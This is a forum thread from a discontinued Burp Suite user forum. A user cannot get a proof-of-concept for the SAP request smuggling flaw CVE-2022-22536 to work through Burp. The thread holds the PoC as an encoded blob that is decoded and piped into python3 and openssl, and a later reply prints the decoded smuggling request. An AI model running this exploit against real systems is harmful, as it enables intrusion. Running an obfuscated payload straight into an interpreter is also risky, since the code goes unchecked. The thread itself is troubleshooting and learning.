Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Problem with openssl s_client trough burp suite

Tobias | Last updated: Feb 21, 2022 10:00AM UTC

Hi all, i got an Problem with a poc for cve 2022-22536.(https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2022-22536) If i use openssl with this command: echo "H4sIAAAAAAACA42PMQ+CMBCFd39Fw6RGqEWChMSBECMDgwNuJgbwUhrx2rTF3y8Fjau53PK99y7vlBZol97pWBFqakXV0PSipU1LB01LyQXS2hiwhrZSN4Pz3HrJZaCQk6KqzpQF7KqvWEhjU8LCfbAdh6VJFO0cvxjQfsYBRzXvtHyCo7lEOyK/BOS2S0kSxlH8ERBaKySm5AGg/LoXryni1lst1Fw489YuE24I4P3g/YSvdfror4bz4Tfaao7SCQEAAA==" | base64 -d | gzip -d | python3 | openssl s_client -ign_eof -connect "127.0.0.1:8443" The PoC works. but if i use the Request direct in Burp it dont work. I try to redirect the openssl request trough burpsuite echo "H4sIAAAAAAACA42PMQ+CMBCFd39Fw6RGqEWChMSBECMDgwNuJgbwUhrx2rTF3y8Fjau53PK99y7vlBZol97pWBFqakXV0PSipU1LB01LyQXS2hiwhrZSN4Pz3HrJZaCQk6KqzpQF7KqvWEhjU8LCfbAdh6VJFO0cvxjQfsYBRzXvtHyCo7lEOyK/BOS2S0kSxlH8ERBaKySm5AGg/LoXryni1lst1Fw489YuE24I4P3g/YSvdfror4bz4Tfaao7SCQEAAA==" | base64 -d | gzip -d | python3 | proxychains4 openssl s_client -ign_eof -connect "127.0.0.1:8443" The Request show up in Burp but the exploit downt work. This exploit used a request smuggling attack so i try to disabble all Burp functions which i think could prevent the successful attack, like update contenth legnth, use HTTP2, etc. But i dont find a solution. Does anyone have any idea what I could test? Or what Burp adds to the valid openssl request so that it is no longer valid? best regards Tobi

Michelle, PortSwigger Agent | Last updated: Feb 22, 2022 01:58PM UTC

Thanks for your message. Do you have any extensions enabled in Burp when you are sending these requests? Is it just this particular PoC that fails, are other requests sent through Burp via this method working? Would you be happy to send some screenshots of what you see in Burp through to support@portswigger.net?

Joris | Last updated: Apr 04, 2022 08:16PM UTC

Hi Tobi, Just saw the above post and unzipped and base64 decoded the payload and saw the content: print("GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1\r\nHost: 127.0.0.1:8443\r\nUser-Agent: Chrome\r\nContent-Length: 82646\r\nConnection: keep-alive\r\n\r\n") print("A"*82642, end="") print("\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:8443\r\n\r\n") Trying to learn here, but why the 82642 * A? What is it for? Joris

Joris | Last updated: Apr 04, 2022 08:18PM UTC